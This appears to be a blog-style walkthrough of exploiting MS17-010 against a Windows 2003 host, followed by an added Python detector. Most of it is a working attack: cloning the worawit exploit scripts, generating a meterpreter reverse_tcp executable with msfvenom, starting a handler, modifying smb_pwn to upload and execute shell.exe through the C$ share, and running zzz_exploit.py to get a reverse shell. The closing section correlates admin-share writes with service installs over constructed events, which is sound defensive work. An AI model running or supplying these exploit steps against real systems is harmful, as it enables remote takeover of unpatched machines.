Test environment:

Attacker: a Kali 2016.2 virtual machine. Target: Windows 2003 (x86).

1. Download the MS17-010 exploit scripts:

git clone https://github.com/worawit/MS17-010/

2. Use checker.py to find a usable named pipe on the target; here the target pipe name is netlogon:

python checker.py 192.168.99.249

3. Generate an msf backdoor exe on Kali:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.86 LPORT=3333 -f exe -o /opt/shell.exe

4. Start an msf handler to catch the reverse shell:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 3333
msf exploit(handler) > set lhost 10.0.0.86
msf exploit(handler) > exploit -j

5. Modify the smb_pwn function in zzz_exploit.py:

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    smb_send_file(smbConn, '/opt/shell.exe', 'C', '/shell.exe')
    service_exec(conn, r'cmd /c  c:\\shell.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."

6. Run the exploit, zzz_exploit.py:

python zzz_exploit.py 192.168.99.249 netlogon

7. Finally, msf receives the reverse shell from the target.
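From the defender's side, the procedure above leaves two correlatable artefacts on the target: an executable written to the C$ administrative share and a new service whose image path runs cmd /c against a binary at the drive root. The following is an added example, not code from the original post or from the worawit/MS17-010 project; it correlates those two signals over constructed, simplified event records whose key=value layout is an assumption, loosely modelled on Windows event IDs 5145 (share access) and 7045 (service install).

```python
import re
from typing import Dict, List, Tuple

# Constructed, simplified event records (key=value per line); not real Windows
# log output. id=5145 stands in for a network-share object access event and
# id=7045 for a "new service installed" event, the two artefacts of the steps above.
SAMPLE_EVENTS = r"""
id=5145 src=10.0.0.86 share=\\*\C$ target=shell.exe access=WriteData
id=5145 src=10.0.0.86 share=\\*\C$ target=pwned.txt access=WriteData
id=7045 src=10.0.0.86 service=svcX1 image=cmd /c c:\shell.exe account=LocalSystem
id=5145 src=10.0.0.50 share=\\*\IPC$ target=srvsvc access=ReadData
id=7045 src=10.0.0.50 service=Backup image=C:\Program Files\Backup\svc.exe account=LocalSystem
"""

# "cmd /c <drive>:\<name>.exe": a service whose binary sits directly at a drive root
DRIVE_ROOT_EXE = re.compile(r'^cmd(\.exe)?\s+/c\s+[a-z]:\\[^\\]+\.exe', re.IGNORECASE)
# administrative drive shares such as C$ or D$
ADMIN_SHARE = re.compile(r'\\[A-Za-z]\$$')
# key=value fields; values may contain spaces, so stop before the next " key="
FIELD = re.compile(r'(\w+)=(.*?)(?=\s+\w+=|$)')

def parse_events(text: str) -> List[Dict[str, str]]:
    """Split each record line into a dict of its key=value fields."""
    return [{m.group(1): m.group(2) for m in FIELD.finditer(line)}
            for line in text.strip().splitlines()]

def find_admin_share_drops(events) -> List[Tuple[str, str, str]]:
    """(src, share, target) for every write to a C$/D$-style administrative share."""
    return [(e['src'], e['share'], e['target']) for e in events
            if e.get('id') == '5145' and e.get('access') == 'WriteData'
            and ADMIN_SHARE.search(e.get('share', ''))]

def find_drive_root_services(events) -> List[Tuple[str, str, str]]:
    """(src, service, image) for service installs that run cmd /c on a drive-root exe."""
    return [(e['src'], e['service'], e['image']) for e in events
            if e.get('id') == '7045' and DRIVE_ROOT_EXE.match(e.get('image', ''))]

def correlate(text: str) -> List[Dict[str, str]]:
    """Alert when a drive-root service install follows a write of the same file
    name over an admin share from the same source address."""
    events = parse_events(text)
    drops = {(src, target.lower()) for src, _, target in find_admin_share_drops(events)}
    alerts = []
    for src, service, image in find_drive_root_services(events):
        exe = image.split('\\')[-1].lower()
        if (src, exe) in drops:
            alerts.append({'src': src, 'service': service, 'image': image})
    return alerts

if __name__ == '__main__':
    for a in correlate(SAMPLE_EVENTS):
        print('ALERT: %(src)s wrote a file over an admin share, then installed %(service)s -> %(image)s' % a)
```

Only the 10.0.0.86 sequence fires; the legitimate Backup service from 10.0.0.50 has no preceding admin-share write and no drive-root image path.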
